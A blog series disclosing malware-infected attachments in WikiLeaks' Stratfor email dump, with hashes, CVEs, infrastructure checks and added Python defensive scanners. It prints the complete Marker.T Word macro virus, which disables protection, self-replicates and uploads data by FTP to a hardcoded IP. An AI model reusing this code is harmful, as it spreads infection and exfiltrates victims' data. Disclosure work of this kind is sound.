
Tuesday, September 15, 2015

Wikileaks website that hosted torrent with infected files is migrated to a new domain

UPDATED: While wlstorage.net has been taken offline and is not currently being redirected elsewhere, it looks like all of that host's functionality is now being provided by https://file.wikileaks.org, mostly as a way to facilitate torrent downloads. The new host appears to require SSL, which wlstorage.net did not. The SSL issue was particularly troubling because all of the torrents available for download on wlstorage.net were created referencing the non-SSL version of the site, establishing an unencrypted connection between the P2P client and wlstorage.net (another great way for the powers that be to identify Wikileaks users). The torrent that includes infected files, gifiles-2014.tar.bz2.torrent, remains available for download as well.
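One way to see what a torrent will make a client connect to, and whether those connections are in the clear, is to read the metadata file itself. The following is an added example, not code from the original post: a small bencode parser in Python that lists the tracker (announce, announce-list) and web-seed (url-list) URLs in a .torrent, flags the ones that use plaintext http:// or udp://, and computes the info-hash that identifies the swarm. The sample torrent is constructed inline with example.net hostnames and placeholder piece hashes; it is not the gifiles torrent.

```python
import hashlib
from urllib.parse import urlsplit


def bdecode(data):
    """Decode a bencoded byte string into ints, bytes, lists and dicts."""
    def parse(i):
        c = data[i:i + 1]
        if c == b"i":                                   # integer: i<digits>e
            end = data.index(b"e", i)
            return int(data[i + 1:end]), end + 1
        if c == b"l":                                   # list: l<items>e
            items, i = [], i + 1
            while data[i:i + 1] != b"e":
                item, i = parse(i)
                items.append(item)
            return items, i + 1
        if c == b"d":                                   # dict: d<key><value>...e
            d, i = {}, i + 1
            while data[i:i + 1] != b"e":
                key, i = parse(i)
                d[key], i = parse(i)
            return d, i + 1
        colon = data.index(b":", i)                     # string: <length>:<bytes>
        length, start = int(data[i:colon]), colon + 1
        return data[start:start + length], start + length

    value, end = parse(0)
    if end != len(data):
        raise ValueError("trailing bytes after bencoded value")
    return value


def bencode(obj):
    """Canonical bencoding (dict keys sorted); this is the form clients hash for the info-hash."""
    if isinstance(obj, bool) or not isinstance(obj, (int, bytes, list, dict)):
        raise TypeError(f"cannot bencode {type(obj).__name__}")
    if isinstance(obj, int):
        return b"i%de" % obj
    if isinstance(obj, bytes):
        return b"%d:%s" % (len(obj), obj)
    if isinstance(obj, list):
        return b"l" + b"".join(bencode(x) for x in obj) + b"e"
    return b"d" + b"".join(bencode(k) + bencode(v) for k, v in sorted(obj.items())) + b"e"


PLAINTEXT_SCHEMES = {"http", "udp"}


def audit_torrent(raw):
    """Summarise where a torrent sends the client and which of those hops are unencrypted."""
    meta = bdecode(raw)
    urls = []
    if b"announce" in meta:
        urls.append(meta[b"announce"].decode())
    for tier in meta.get(b"announce-list", []):         # BEP 12: a list of tiers, each a list of URLs
        urls.extend(u.decode() for u in tier)
    webseeds = meta.get(b"url-list", [])                # BEP 19: a single string or a list of strings
    if isinstance(webseeds, bytes):
        webseeds = [webseeds]
    urls.extend(u.decode() for u in webseeds)
    urls = list(dict.fromkeys(urls))                    # de-duplicate, keep first-seen order
    plaintext = [u for u in urls if urlsplit(u).scheme.lower() in PLAINTEXT_SCHEMES]
    # The info-hash is SHA-1 over the bencoded "info" dict. Re-encoding canonically
    # reproduces the original bytes only if the file was canonically encoded to begin with.
    info_hash = hashlib.sha1(bencode(meta[b"info"])).hexdigest()
    return {"name": meta[b"info"][b"name"].decode(), "info_hash": info_hash,
            "urls": urls, "plaintext": plaintext}


# Constructed sample: example.net hosts and dummy piece hashes (4 pieces of 256 KiB).
SAMPLE_TORRENT = bencode({
    b"announce": b"http://tracker.example.net/announce",
    b"announce-list": [[b"http://tracker.example.net/announce"],
                       [b"https://backup.example.net/announce"]],
    b"url-list": [b"http://files.example.net/archive/"],
    b"info": {b"name": b"sample-archive.tar.bz2", b"piece length": 262144,
              b"length": 1048576, b"pieces": b"\x00" * 80},
})

if __name__ == "__main__":
    report = audit_torrent(SAMPLE_TORRENT)
    print(report["name"], report["info_hash"])
    for url in report["urls"]:
        print(("CLEARTEXT " if url in report["plaintext"] else "encrypted ") + url)
```

Run against a real .torrent by passing the file's bytes to audit_torrent(); any URL in the "plaintext" list is a connection the client will make without TLS, which is the exposure the paragraph above describes.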

As I discussed in my series of posts explaining how the Stratfor email dump hosted by Wikileaks contains malicious software, I first came across a series of infected files when I downloaded and reviewed a torrent file hosted on the Wikileaks subsite "wlstorage.net". A number of factors at the time led me to believe that "wlstorage.net" was not a mirror of Wikileaks hosted by a third party, but was in fact run by the Wikileaks organization directly: notably, that both wlstorage.net and wikileaks.org resolved to the same set of IP addresses, both sites shared the same SSL certificate, and wlstorage.net was linked to throughout wikileaks.org.

Today it was brought to my attention that wlstorage.net has been taken offline, and I verified that the DNS entry for wlstorage.net has been kiboshed. wlstorage.net uses the Wikileaks nameservers (ns1.wikileaks.org & ns2.wikileaks.org), so this change would have been performed by a trusted member of the Wikileaks technical team. I am not aware of any announcements from Wikileaks stating the reason for the removal of wlstorage.net from DNS. Whatever the reason for the change, this update has not removed the infected files from distribution.

As of this writing (9/15/2015), all of the infected files remain available for direct, individual download through dozens of curated links on the wikileaks.org website. I have also received reports that those attempting to download the infected torrent using a BitTorrent client are unable to find a complete peer to seed it. If anyone wishes to review these files for research purposes you are welcome to contact me and I can seed temporarily. For obvious reasons I am not interested in seeding the torrent on anything like an ongoing basis, and I encourage researchers and journalists to review the infected files directly on wikileaks.org as a first step. I have compiled a list of URLs containing infected files and posted it to Pastebin; I also have a post explaining that infected files are not restricted to the torrent.

Wednesday, July 15, 2015

Malware discovered in the Stratfor email file dump provided by Wikileaks is not limited to torrents - curated content on the Wikileaks website also infected

Several months ago I identified malicious software contained within a torrent available for download from Wikileaks. The torrent was the most recent and most complete copy of what Wikileaks titled the "Global Intelligence Files" - a large trove of emails and attachments from defense contractor Stratfor. The story as it is widely understood is that former Lulzsec member and hacktivist Jeremy Hammond was involved in the acquisition of these files from Stratfor and provided them to Wikileaks. Among the many files included in the leak I have identified 18 that have malicious software; most of those are embedded within PDF and DOC files. Some of the attacks I discovered are old, others are less old. Only two of the 18 files are blocked from downloading using Google Chrome's malware protection service, for example. In a second post, I decompile one of these two (older) files using PE Explorer and Hex-Rays IDA to demonstrate how the file corrupts the Microsoft Connection Manager while posing as an application called iPassConnect in order to facilitate infection with a Magistr worm variant.

Since that time I have made numerous attempts to contact Wikileaks so that they could inform their users that the torrent contained malicious software. After receiving no response, I began to publicize my findings by posting them on Hacker News/Ycombinator and similar sites like Slashdot and Reddit. My post on Hacker News quickly reached the front page and attracted the attention of the former leader of Lulzsec, Hector Monsegur (aka sabu), who confirmed the validity and importance of my findings in a series of public tweets.

In my original post, I speculated that:
"The data is indeed massive, over 5.5 million emails. Perhaps so massive that ~ two years was not long enough to properly review and sanitize these files prior to their complete publication in 2014 (from the time they were received by WL sometime around 2012)."
The publication of the Global Intelligence Files by Wikileaks began on February 27th, 2012. The entire email server spool was not dumped onto the internet at one time. The publication was curated, with only a small percentage of the emails being published initially. Over time, more emails were published. This progression can be easily viewed on the directory hosting the torrents for the Stratfor leaks:
[Image: the torrent download index for the Stratfor leaks]
The file name of each torrent contains the date of its publication. Meanwhile, the number to the far right, beginning with 1603, indicates the size of the torrent in bytes. While the relationship between the size of a torrent and the size of the files it contains is not a direct one in all cases, in this case it is a fairly direct relationship because we are dealing with large lists of small files. The last torrent, which I have identified as containing malware, has a size of 121071 bytes. The point here is that you can see that the number of files contained in the archive grows over time.

The torrent file that contains malware is the only file in the directory with a nomenclature that does not include a full date (it was also created using bzip instead of 7zip); the filename is simply gifiles-2014.tar.bz2.torrent. Initially, this meant I was not sure of the exact date that the torrent was released.

I knew that a relatively small amount of curated content was available on the Wikileaks.org website. Today I was able to confirm that malicious files and their related attachments are also being hosted on Wikileaks.org as individual, uncompressed files. I have compiled a list of these files, their URLs and basic file information on pastebin (I have embedded the pastebin below as an iframe; if you don't trust iframes in your browser you can click through the prior link instead):

NOTE: Wikileaks has multiple URLs servicing multiple directory structures, all that eventually seem to point to the same place. So for example, https://wikileaks.org/gifiles/docs/35/3547802_plans-coordinates-and-executes-.html and https://search.wikileaks.org/gifiles/emailid/3547802 both point to the same content (and include the same malware attachment available for download).

While I am not alone in my concern over the circulation of an infected torrent of the nature I described in my first post, posting individual infected files directly to the *.wikileaks.org domain and several subdomains in a curated manner is likely more dangerous: users are more likely to consider the following a link to content that has in some fashion been secured:

[Image: the attachment link as shown on wikileaks.org]

An expectation that a video posted on Fox News will not contain an embedded script is not a wild expectation. Similarly a New York Times article that includes a photo in an article is usually believed to not contain spyware. This is a basic expectation of service on every website, not just news outlets. Primary sources are important. User transparency is also important.

The attached file above, "18714_Research_and_R.xls", appears to be a normal Excel spreadsheet but in fact contains an embedded OLE. It is the exact size in bytes as the same attachment I discovered within the torrent that started this series of posts:

[Image: file size of the same attachment inside the torrent]

Of course there is no need to take my word for it. The file contains an embedded OLE and PE file - the hallmarks of malware designed to exploit vulnerabilities in the Microsoft Office Suite. Of note are the following:

An API-Hashing signature is stored at 0x3ad1
There are two decryption loops at 0x00003932 and 0x00003934
The embedded OLE signature is stored at 0x7a00
A XOR encrypted MZ/PE signature is stored at 0x5a00 and the encryption key is 0x97
A ROL encrypted OLE signature is stored at 0x7a00 and the encryption key is 0x08

OfficeMalScanner can duplicate these results. When I ran OfficeMalScanner against "18714_Research_and_R.xls" using the brute debug scan mode, the scan produced a malicious index of 62. Several antiviruses will detect this file. Depending on which you use, it might declare the file to use CVE-2009-3129 or CVE-2009-0557 (it probably relies on both exploits at different points). I have created bin files from memory dumps of the embedded OLE and PE (as I have for the roughly dozen similar malware payloads); I am happy to provide those to interested researchers. Here are the relevant signatures:

MD5 2746a014bdd9f7bf252262b82cf63e11
SHA1 cf525700b9e1027c4628fa9689bf68777291c60d
SHA256 4f9550c3f3abbfac4153b4467666e7a46e29ab974627ffd7feed7a711d55ffcd
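The obfuscated signatures listed above are found the way OfficeMalScanner's brute mode finds them: decode the whole file under every candidate XOR key and ROL count, then look for the PE and OLE2 headers in the result. The following is an added example written for this post, an independent re-implementation rather than OfficeMalScanner's code or the sample from the post: a Python scanner that does that brute-force pass, checks the MZ/PE chain (so a stray "MZ" alone is not reported), identifies the container from its magic bytes regardless of extension, and computes the MD5/SHA-1/SHA-256 digests used to match a file against published signatures. The test blob is constructed inline: an OLE2 header, some filler text, a PE stub XORed with 0x97 and an OLE2 magic rotated right by 3; the offsets and keys in it are arbitrary and not those of 18714_Research_and_R.xls.

```python
import hashlib
import struct

OLE2_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")   # OLE2 compound-file header
PE_SIG = b"PE\x00\x00"


def xor_table(key):
    """Translation table that XORs every byte with key (key 0 is the identity)."""
    return bytes(b ^ key for b in range(256))


def rol_table(n):
    """Translation table that rotates every byte left by n bits."""
    n &= 7
    return bytes(((b << n) | (b >> (8 - n))) & 0xFF for b in range(256))


def sniff_type(data):
    """Container type from magic bytes; the file extension is not to be trusted."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"           # legacy .doc/.xls/.ppt
    if data.startswith(b"{\\rtf"):
        return "rtf"            # RTF, whatever the extension says
    if data.startswith(b"PK\x03\x04"):
        return "zip"            # OOXML or a plain archive
    if data.startswith(b"%PDF"):
        return "pdf"
    if data.startswith(b"MZ"):
        return "pe"
    return "unknown"


def pe_offsets(buf):
    """Offsets where 'MZ' is followed by an e_lfanew that lands on 'PE\\0\\0'.
    Requiring the chained signature avoids flagging every stray 'MZ'."""
    hits, pos = [], buf.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(buf):
            (e_lfanew,) = struct.unpack_from("<I", buf, pos + 0x3C)
            pe = pos + e_lfanew
            if 0x40 <= e_lfanew < 0x1000 and buf[pe:pe + 4] == PE_SIG:
                hits.append(pos)
        pos = buf.find(b"MZ", pos + 1)
    return hits


def scan(data):
    """Return (kind, transform, key, offset) for every embedded header found.
    XOR key 0 is the identity and so also covers the unobfuscated case."""
    findings = []
    transforms = [("xor", k, xor_table(k)) for k in range(256)]
    transforms += [("rol", n, rol_table(n)) for n in range(1, 8)]
    for name, key, table in transforms:
        decoded = data.translate(table)        # whole-buffer decode via a 256-byte table
        findings += [("PE", name, key, off) for off in pe_offsets(decoded)]
        off = decoded.find(OLE2_MAGIC)
        while off != -1:
            findings.append(("OLE2", name, key, off))
            off = decoded.find(OLE2_MAGIC, off + 1)
    return findings


def digests(data):
    """MD5/SHA-1/SHA-256 of the blob, for matching against published signatures."""
    return {n: hashlib.new(n, data).hexdigest() for n in ("md5", "sha1", "sha256")}


# --- constructed sample, not the file from the post ---------------------------
def pe_stub():
    """Minimal DOS/PE header: 'MZ', e_lfanew = 0x80, 'PE\\0\\0' at 0x80."""
    hdr = bytearray(0x100)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    hdr[0x80:0x84] = PE_SIG
    return bytes(hdr)


FILLER = b"Quarterly review of regional energy markets and the forecast for lithium demand. "


def build_sample():
    """OLE2 header at 0, filler text, a PE stub XORed with 0x97 at 0x200, and the
    OLE2 magic rotated right by 3 (== rol 5) at 0x400 so that rol 3 recovers it."""
    buf = bytearray(0x500)
    buf[0:8] = OLE2_MAGIC
    buf[8:0x200] = (FILLER * 8)[:0x200 - 8]
    buf[0x200:0x300] = pe_stub().translate(xor_table(0x97))
    buf[0x400:0x408] = OLE2_MAGIC.translate(rol_table(5))
    return bytes(buf)


if __name__ == "__main__":
    blob = build_sample()
    print(sniff_type(blob), digests(blob)["sha256"])
    for kind, name, key, off in scan(blob):
        print(f"{kind:5} via {name} key 0x{key:02x} at offset 0x{off:04x}")
```

Using bytes.translate keeps the 262 full-buffer decodes fast enough for multi-megabyte attachments, and the e_lfanew check is what separates a genuine embedded executable from coincidental byte pairs.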

As I mentioned earlier in this post, Google malware service in Chrome detects only three of the so far 18 infected attachments. The two that are detected are the two oldest malware by the date sent and are both compressed executables (one a .COM and the other two are .EXE) rather than embedded within documents. Here is what downloading one of these off of the Wikileaks website looks like as of now:

[Image: Chrome blocking the download from wikileaks.org]

Both of the old nasty .EXE's appear to have been sent from mfriedman@stratfor.com, which as far as I can tell, was/is the email address of Meredith Friedman, the VP of Communications for Stratfor:

 Email-ID 3451016
 Date 2003-11-04 15:32:57
 From mfriedman@stratfor.com
 To mooney@stratfor.com, wit@stratfor.com
 Subject: FW: Re[2]: our private photos bkarngkr
 
 Email-ID 3491917
 Date 2004-01-27 01:03:10
 From mfriedman@stratfor.com
 To mooney@stratfor.com
 Subject: FW: HI

Would anyone care to bet me a dollar that in late 2003 her email password was "mfriedman", her birthday, "12345" or some combination thereof?

The source of the .COM file is as follows:

 Email-ID 3547802
 Date 2001-11-10 05:16:54
 From rcleicht@worldnet.att.net
 To undisclosed-recipients:
 Subject: Plans, coordinates, and executes

Finally for today, please do not make the mistake of assuming that all of the exploits are from this time period and thus are of no importance to modern computer users. I cannot make this clear enough: these two files are the *oldest* of the malicious files I have discovered.

To return to the first post in our series on the Wikileaks / Stratfor email malware click here.

If you are looking for the second post, where we look briefly inside one of the executables, click here.

This is the link for my conversation with Hector Monsegur AKA sabu of Lulzsec on the Wikileaks / Stratfor email malware.

Monday, July 13, 2015

Hector Monsegur (formerly sabu of Lulzsec) has responded to my analysis of the Wikileaks Global Intelligence Files

Some time ago I wrote two blog posts about my discovery of a series of malware-infected files within a torrent being circulated by the global whistleblower organization Wikileaks.

The torrent file was one of the latest versions of what Wikileaks has named the "Global Intelligence Files" - a large cache of documents obtained from the email spool of a government contractor known as Stratfor.

Since my discovery I have made several attempts to contact Wikileaks:

In addition to Twitter I have attempted to email just about every address I could find on their site (none of them work), as well as attempting to use the chat function mentioned on the Wikileaks Twitter feed. I have been unable to receive a response. Users must be notified when a file transfer contains malware; particularly given the sensitive nature of the documents in question.

This afternoon I received a series of comments on Twitter from former Lulzsec member Hector Monsegur. In his comments, Monsegur denies instigating the attack that led to the release of the Stratfor files while confirming the danger of the malware contained in the files I identified:



[Image: Hector Monsegur during an interview with CBS]
I responded to Hector's comments by thanking him for his input, putting forth my own theory that the malware contained in the document dumps is typical of snowshoe-spam malware infiltration techniques, and reiterating the importance of Wikileaks notifying users of the danger of downloading malware contained in the torrent in question:


As of this writing (3PM @ 7-13-2015) Wikileaks continues to provide a torrent file with an identical timestamp, filename and byte size as the one I analyzed without any warning message notifying users of the danger of handling the files.

To return to the first post in our series on the Wikileaks / Stratfor email malware click here.

If you are looking for the second post, where we look briefly inside one of the executables, click here.

And here is a link to the next post in my Wikileaks / Stratfor email malware series, where I demonstrate how the malware is available file by file on the Wikileaks.Org website, and not just within the torrent as I originally suspected.

Monday, March 30, 2015

Wikileaks Global Intelligence File Dump is Loaded With Malicious Software

Click here for the second post on this topic, which includes more detailed technical information.

Hector Monsegur, formerly sabu of Lulzsec, has offered his point of view on this post. Get his opinion by reading my third post on the topic.

In my fourth post on this topic, I explain how malware is not limited to the Stratfor leak torrent - curated links throughout the Wikileaks.Org website allow users to download individual infected files.

This series of posts is beginning to receive coverage from several newspapers around the world. German speakers should check out the story in Neue Zürcher Zeitung / New Zurich Times. For English speakers, I recommend The Register from the UK for an excellent summary of these findings.

Beginning on February 27, 2012, the controversial news organization Wikileaks has been publishing a large and growing trove of emails from the private intelligence firm Strategic Forecasting, Inc (more widely known as Stratfor). The leak publication began with 200 emails, with Wikileaks progressively publishing more and more emails through the final publication date of July 18, 2014, at which time a single file containing over 5 million emails was published.

The source of the content was Jeremy Hammond, working in concert with Hector Xavier Monsegur as part of the group AntiSec. Hammond is currently in prison for the hack. Monsegur remains free; he was an FBI informant at the time of the hack and the release of the files. While the hack is attributed to Hammond, reliable sources are indicating that it was Monsegur who instigated the attack while he worked for the FBI. (NOTE: Hector X. Monsegur has personally responded to this blog post and has denied this characterization of what happened. My only information on the history of the documents was obtained through media sources and court documents, which are often not reliable. I have not attempted to contact Jeremy Hammond. I only included this very brief foreword in an attempt to explain the history of the documents, which is still contested.)

It has been widely reported that Monsegur used an FBI-provided laptop and often worked full-time from an FBI office in New York during the nine-month period in which #antisec and #lulzsec released their widely distributed hacks, including the Stratfor job. To confuse matters further, court documents include reference to a third party, someone named Hyrriiya, who provided information critical to the Stratfor intrusion.

The content of the emails, though of obvious political and social significance, is not relevant to our post here. Newspapers around the world have spent a significant amount of time reporting on those leaks. However, no one appears to have noticed that a significant number of the files included in the leak contain malicious code that is designed to, among other things, retrieve detailed information about the computers that have downloaded them and send it to a variety of remote systems.

My research is still in progress; however, the wide circulation of this data and the apparent lack of any notification of the danger in these files have convinced me to publish what little I have found immediately.

I ought to be clear from the outset: I have no information linking Wikileaks, Assange, Hammond, Monsegur, the FBI or anyone else directly with these malicious files. That very well may change quickly as research progresses, but at no point should this post be considered finger pointing. The purpose of this post is not to assign responsibility but to ensure that the journalists and activists downloading these files, or who have already downloaded these files, understand the consequences and take proper precautions. If I can encourage security researchers to take a look at these files it would be a bonus.

The files in question are not being distributed directly through the wikileaks.org domain, but through a secondary domain, wlstorage.net. While the domains are separate, wlstorage.net is linked directly from the Wikileaks Global Intelligence Files web page (at https://wikileaks.org/gifiles), and the two share the same SSL certificate as well as the same IP addresses. This would seem to (but doesn't entirely) rule out the notion that traffic is being diverted from Wikileaks to a fake server to fool users into downloading the malicious files.


# host wikileaks.org
wikileaks.org has address 195.35.109.53
wikileaks.org has address 91.218.114.210
wikileaks.org has address 91.218.244.152
wikileaks.org has address 95.211.113.131
wikileaks.org has address 95.211.113.154
wikileaks.org has address 195.35.109.44
wikileaks.org mail is handled by 1 mx.wikileaks.org.

# host wlstorage.net
wlstorage.net has address 91.218.114.210
wlstorage.net has address 91.218.244.152
wlstorage.net has address 95.211.113.131
wlstorage.net has address 95.211.113.154
wlstorage.net has address 195.35.109.44
wlstorage.net has address 195.35.109.53

[Image: The Wikileaks.Org Global Intelligence Files web page]
[Image: The link to wlstorage.net from Wikileaks]
The link to wlstorage.net points to a list of torrent files. As mentioned previously, Wikileaks began with a small initial leak of documents and released progressively more over time. Each of these torrents is a different version of the leak, which grew to include more and more files as they were apparently reviewed by the Wikileaks team. Notice that the very last torrent uses a different compression method and file nomenclature than the rest of the torrents. It is this last file, and this file only, in which I have identified malware.
[Image: The Global Intelligence Files torrent files on wlstorage.net]
The SSL Certificate for both domains is the same:
issuer= /C=FR/O=GANDI SAS/CN=Gandi Standard SSL CA
subject= /OU=Domain Control Validated/OU=Gandi Standard Wildcard SSL/CN=*.wikileaks.org
notBefore=Oct 14 00:00:00 2013 GMT
notAfter=Oct 14 23:59:59 2015 GMT
00b5f826
SHA1 Fingerprint=10:B3:D9:66:7F:BC:57:B5:C1:CF:98:5B:16:E3:EC:61:A4:C3:ED:32

# echo |\
> openssl s_client -connect wikileaks.org:443 2>&1 |\
> sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p'
-----BEGIN CERTIFICATE-----
[certificate body omitted]
-----END CERTIFICATE-----


# echo |\
> openssl s_client -connect wlstorage.net:443 2>&1 |\
> sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p'
-----BEGIN CERTIFICATE-----
[certificate body omitted]
-----END CERTIFICATE-----

I have reviewed the last two file dumps listed in the wlstorage.net torrent list: gifiles-20121104151320.7z & gifiles-2014.tar.bz2. I was unable to identify any malware in gifiles-20121104151320.7z, which is notable for a number of reasons. Each of these files is massive: gifiles-20121104151320.7z is close to 3GB while compressed. However, gifiles-2014.tar.bz2 is 9x the size of gifiles-20121104151320.7z. The two files also use a different compression scheme. 7zip is a Windows compression program, and 7zip was used to make every gifiles torrent dump except for gifiles-2014.tar.bz2, which uses tar and bzip2, commonly used on both Windows and Linux. It's reasonable to assume that gifiles-2014.tar.bz2 was created on a different computer than all of the other distributions.

I've identified the following exploits being used:


MARKER.T 
CVE-2006-2492
CVE-2009-0557 
CVE-2011-0611 
CVE-2010-3333 
HEAPSPRAY 
Mydoom 
Magistr 
Pdfjsc.BP 
Wordjmp.gen 
Mimail 

The software vulnerable to these exploits is (version omitted while research is in progress): 

Adobe Acrobat
Adobe Flash Player
ActiveX
Microsoft Office
Microsoft Office for Mac
Open XML File Format Converter

These exploits are contained in the following files:

gifiles-2014\gifiles\attach\6\6566_The Split Betw.doc
gifiles-2014\gifiles\attach\19\19701_MASY - Q MASY HUMINT.doc
gifiles-2014\gifiles\attach\19\19719_List of Addresses - Advance Copies.doc
gifiles-2014\gifiles\attach\152\152977_Happy vacation.pdf
gifiles-2014\gifiles\attach\18\18714_Research_and_R.xls
gifiles-2014\gifiles\attach\117\117687_Lithium.doc
gifiles-2014\gifiles\attach\117\117870_Hybrid write-up2.doc
gifiles-2014\gifiles\attach\117\117793_Hybrid write-up.doc
gifiles-2014\gifiles\attach\47\47247_US Congress re.doc
gifiles-2014\gifiles\attach\47\47329_US Congress re.doc
gifiles-2014\gifiles\attach\52\52004_IRAN_STRAIT_PART.pdf
gifiles-2014\gifiles\attach\151\151784_Command.com
gifiles-2014\gifiles\attach\151\151098_text.zip->(Zip)
gifiles-2014\gifiles\attach\151\151098_text.zip->text.exe
gifiles-2014\gifiles\attach\119\119443_Russia Data Requests.doc
gifiles-2014\gifiles\attach\142\142345_photos.zip->(Zip)
gifiles-2014\gifiles\attach\142\142345_photos.zip->photos.jpg.exe
gifiles-2014\gifiles\attach\146\146924_message.zip->(Zip)
gifiles-2014\gifiles\attach\146\146924_message.zip->message.exe
gifiles-2014\gifiles\attach\17\17102_Draft scenarios for Libya_0416.pdf

These attachments are just phishing nonsense and don't contain malicious software, but if you scan this dump with an antivirus they may trigger a detection:

gifiles-2014\gifiles\docs\34\3485657_your-friend-cj-saw-miniture-tesla-generator-in-action-live.html
gifiles-2014\gifiles\attach\20\20497_PP-001-460-891-520.html

I have been working on extracting the payloads from the .DOC files first before moving on to the .PDFs and attempting to decompile the few executables. I have been able to confirm that the exploits and payloads in 117687_Lithium.doc, 117870_Hybrid write-up2.doc and 17793_Hybrid write-up.doc are identical. Here are the relevant signatures for the files:

117687_Lithium.doc
md5 6451dc0fc47122e75e3af66c9547d420
sha1 88eaf2aaa211d761c190d310d181f9f4e8d3853b
sha256 34b2bb5d9ac4abbf39d303dadabd3c6e45033643070bd3636ccab74b37d6f2d2

17793_Hybrid write-up.doc
md5 87114142e32fd455b525c900e4342475
sha1 cfda55de190f6b71434b4a4b66b2a372773133db
sha256 9bde32a6679339263d69a23da7b971ffb5c9882fbae9be311eeb28c49e817358

117870_Hybrid write-up2.doc
md5 6fde4a58f42deba3613030cbb93aef2b
sha1 07191e232304f3c7853e18916bb89f8af4cda3b1
sha256 32473591c2aa8bb96f9d48b224726f39480327606eb35641a2b4f2493af81655

Each of these three documents contains the following Visual Basic macro, a classic Marker.T that is well over 10 years old:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Const Marker = "<- this is a marker!"
'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
'Switch the VirusProtection OFF
Options.VirusProtection = False
  If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
    If DocumentInfected = True Then
      LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
    ElseIf NormalTemplateInfected = True Then
      LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    End If
    LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
    For i = 1 To 4
      LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
    Next i
    LogFile = "C:\hsf" & LogFile & ".sys"
    Open LogFile For Output As #1
    Print #1, LogData
    Close #1
    Open "c:\netldx.vxd" For Output As #1
    Print #1, "o 209.201.88.110"
    Print #1, "user anonymous"
    Print #1, "pass itsme@"
    Print #1, "cd incoming"
    Print #1, "ascii"
    Print #1, "put " & LogFile
    Print #1, "quit"
    Close #1
    Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
  End If
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
  'Infect the NormalTemplate
  If DocumentInfected = True Then
    SaveNormalTemplate = NormalTemplate.Saved
    OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
      'Write a log file of this NormalTemplate infection
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i
    OurCode = OurCode & Chr(13) & _
              "' " & Format(Time, "hh:mm:ss AMPM - ") & _
                     Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & UserAddress & Chr(13)
    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
    If SaveNormalTemplate = True Then NormalTemplate.Save
  End If
  'Infect the ActiveDocument
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
    SaveDocument = ActiveDocument.Saved
    OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString OurCode
    If SaveDocument = True Then ActiveDocument.Save
  End If
End If
End Sub

We shouldn't be convinced that this is the entire payload. The IP address included here has been recorded as a part of Marker.T since 2002. Just to be on the safe side, I tried it - there are no FTP connections being accepted at 209.201.88.110, which looks like it is assigned to a Vietnamese restaurant in New Jersey.
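A first pass over a macro like the one above does not need a debugger: most of what matters to a defender is visible in the VBA source. The following is an added example, not code from the original post and not olevba or any other published tool: a Python triage script that greps macro source for the behaviours the Marker.T code exhibits (an auto-execute entry point, VirusProtection switched off, writes into the Normal template's VBProject, Shell, file output, a registry key, blanket error suppression), pulls out IPv4 addresses and Windows paths as indicators, and produces a crude score. The indicator names and weights are this example's own convention. The input is an excerpt of the macro quoted above plus a constructed benign macro for contrast.

```python
import re

# Behaviours a defender looks for in Word/Excel macro source, each as a regex over VBA.
# The indicator names and weights are this example's own convention, not a published taxonomy.
INDICATORS = {
    "autoexec": re.compile(
        r"\bSub\s+(?:Auto(?:Open|Close|Exec|New)|Document_(?:Open|Close|New)|Workbook_Open)\b", re.I),
    "disable_av": re.compile(r"Options\.VirusProtection\s*=\s*False", re.I),
    "self_replicate": re.compile(r"\b(?:NormalTemplate|ActiveDocument)\.VBProject\b", re.I),
    "code_inject": re.compile(r"\.CodeModule\.(?:AddFromString|InsertLines|DeleteLines)\b", re.I),
    "shell_exec": re.compile(r"\bShell\s*\(?\s*\"[^\"]*\"", re.I),
    "file_write": re.compile(r"\bOpen\s+(?:\"[^\"]+\"|\w+)\s+For\s+(?:Output|Append|Binary)\b", re.I),
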